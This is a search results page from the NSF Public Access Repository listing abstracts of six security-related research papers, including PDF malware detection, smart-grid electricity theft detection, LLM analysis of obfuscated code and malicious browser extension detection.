NSF PAR Search | NSF Public Access Repository

Note: When clicking on a Digital Object Identifier (DOI) number, you will be taken to an external site maintained by the publisher. Some full text articles may not yet be available without a charge during the embargo (administrative interval).
What is a DOI Number?

Some links on this page may take you to non-federal websites. Their policies may differ from this site.

Image-based PDF Malware Detection Using Pre-trained Deep Neural Networks

https://doi.org/10.1109/ISDFS60797.2024.10527343

Nichols, Tyler; Zemlanicky, Jack; Luo, Zhirui; Li, Qingqing; Zheng, Jun (April 2024, 2024 12th International Symposium on Digital Forensics and Security (ISDFS))

PDF is a popular document file format with a flexible file structure that can embed diverse types of content, including images and JavaScript code. However, these features make it a favored vehicle for malware attackers. In this paper, we propose an image-based PDF malware detection method that utilizes pre-trained deep neural networks (DNNs). Specifically, we convert PDF files into fixed-size grayscale images using an image visualization technique. These images are then fed into pre-trained DNN models to classify them as benign or malicious. We investigated four classical pre-trained DNN models in our study. We evaluated the performance of the proposed method using the publicly available Contagio PDF malware dataset. Our results demonstrate that MobileNetv3 achieves the best detection performance with an accuracy of 0.9969 and exhibits low computational complexity, making it a promising solution for image-based PDF malware detection.
more » « less
Full Text Available
Enhancing the Performance of Semi-supervised Electricity Theft Detection in Smart Grids with Feature Engineering and Ensemble Learning

https://doi.org/10.1109/KPEC61529.2024.10676305

Qi, Ruobin; Japp, Wynter; Pan, Stephen; Zheng, Jun; Shao, Sihua (April 2024, IEEE)

Electricity theft is a type of cyberattack posing significant risks to the security of smart grids. Semi-supervised outlier detection (SSOD) algorithms utilize normal power usage data to build detection models, enabling them to detect unknown electricity theft attacks. In this paper, we applied feature engineering and ensemble learning to improve the detection performance of SSOD algorithms. Specifically, we extracted 22 time-series and wavelet features from load profiles, which served as inputs for the seven popular SSOD algorithms investigated in this study. Experimental results demonstrate that the proposed feature engineering greatly enhances the performance of SSOD algorithms to detect various false data injection (FDI) attacks. Furthermore, we constructed bagged ensemble models using the best-performing SSOD algorithm as the base model, with results indicating further improvements in detection performance compared to the base model alone.
more » « less
Full Text Available
Evaluation of Large Language Models on Code Obfuscation (Student Abstract)

https://doi.org/10.1609/aaai.v38i21.30517

Swindle, Adrian; McNealy, Derrick; Krishnan, Giri; Ramyaa, Ramyaa (March 2024, Proceedings of the AAAI Conference on Artificial Intelligence)

Obfuscation intends to decrease interpretability of code and identification of code behavior. Large Language Models(LLMs) have been proposed for code synthesis and code analysis. This paper attempts to understand how well LLMs can analyse code and identify code behavior. Specifically, this paper systematically evaluates several LLMs’ capabilities to detect obfuscated code and identify behavior across a variety of obfuscation techniques with varying levels of complexity. LLMs proved to be better at detecting obfuscations that changed identifiers, even to misleading ones, compared to obfuscations involving code insertions (unused variables, as well as variables that replace constants with expressions that evaluate to those constants). Hardest to detect were obfuscations that layered multiple simple transformations. For these, only 20-40% of the LLMs’ responses were correct. Adding misleading documentation was also successful in misleading LLMs. We provide all our code to replicate results at https://github.com/SwindleA/LLMCodeObfuscation. Overall, our results suggest a gap in LLMs’ ability to understand code.
more » « less
Full Text Available
Exploring Spatial Transformation-Based Privacy in a Small Town

Jacobs, Aidan; Mazumdar, Subhasish (June 2023, MOBILITY 2023 : The Thirteenth International Conference on Mobile Services, Resources, and Users)

As mobile devices become increasingly prevalent in society, the expected utility of such devices rises; arguably, the most impact comes from location-based services as they provide tremendous benefits to mobile users. These users also value privacy, i.e., keeping their locations and search queries private, but that is not easy to achieve. It has been previously proposed that user location privacy can be secured through the use of space filling curves due to their ability to preserve spatial proximity while hiding the actual physical locations. With a space filling curve, such as the Hilbert curve, an application that provides location-based services can allow the user to take advantage of those services without transmitting a physical location. Earlier research has uncovered vulnerabilities of such systems and proposed remedies. But those countermeasures were clearly aimed at reasonably large metropolitan areas. It was not clear if they were appropriate for small towns, which display sparsity of Points of Interest (POIs) and limited diversity in their categories. This paper studies the issue focusing on a small university town.
more » « less
Full Text Available
Detecting Malicious Browser Extensions by Combining Machine Learning and Feature Engineering

https://doi.org/10.1007/978-3-031-28332-1_13

Rydecki, J.; Tong, J.; Zheng, J. (May 2023, Advances in intelligent systems and computing)
Latifi, S. (Ed.)
As the popularity of the internet continues to grow, along with the use of web browsers and browser extensions, the threat of malicious browser extensions has increased and therefore demands an effective way to detect and in turn prevent the installation of these malicious extensions. These extensions compromise private user information (including usernames and passwords) and are also able to compromise the user’s computer in the form of Trojans and other malicious software. This paper presents a method which combines machine learning and feature engineering to detect malicious browser extensions. By analyzing the static code of browser extensions and looking for features in the static code, the method predicts whether a browser extension is malicious or benign with a machine learning algorithm. Four machine learning algorithms (SVM, RF, KNN, and XGBoost) were tested with a dataset collected by ourselves in this study. Their detection performance in terms of different performance metrics are discussed.
more » « less
Full Text Available
Securing Smart Grid Enabled Home Area Networks with Retro-Reflective Visible Light Communication

https://doi.org/10.3390/s23031245

Salas, Mathew; Shao, Sihua; Salustri, Adrian; Schroeck, Zachary; Zheng, Jun (February 2023, Sensors)

Smart appliances’ run schedule and electric vehicles charging can be managed over a smart grid enabled home area network (HAN) to reduce electricity demand at critical times and add more plug-in electric vehicles to the grid, which eventually lower customers’ energy bills and reduce greenhouse gas emissions. Short range radio-based wireless communication technologies commonly adopted in a HAN are vulnerable to cyber attacks due to their wide interception range. In this work, a low-cost solution is proposed for securing the low-volume data exchange of sensitive tasks (e.g., key management and mutual authentication). Our approach utilizes the emerging concept of retro-reflector based visible light communication (Retro-VLC), where smart appliances, IoT sensors and other electric devices perform the sensitive data exchange with the HAN gateway via the secure Retro-VLC channel. To conduct the feasibility study, a multi-pixel Retro-VLC link is prototyped to enable quadrature amplitude modulation. The bit error rate of Retro-VLC is studied analytically, numerically and experimentally. A heterogeneous Retro-VLC + WLAN connection is implemented by socket programming. In addition, the working range, sniffing range, and key exchange latency are measured. The results validate the applicability of the Retro-VLC based solution.
more » « less
Full Text Available

Search for: All records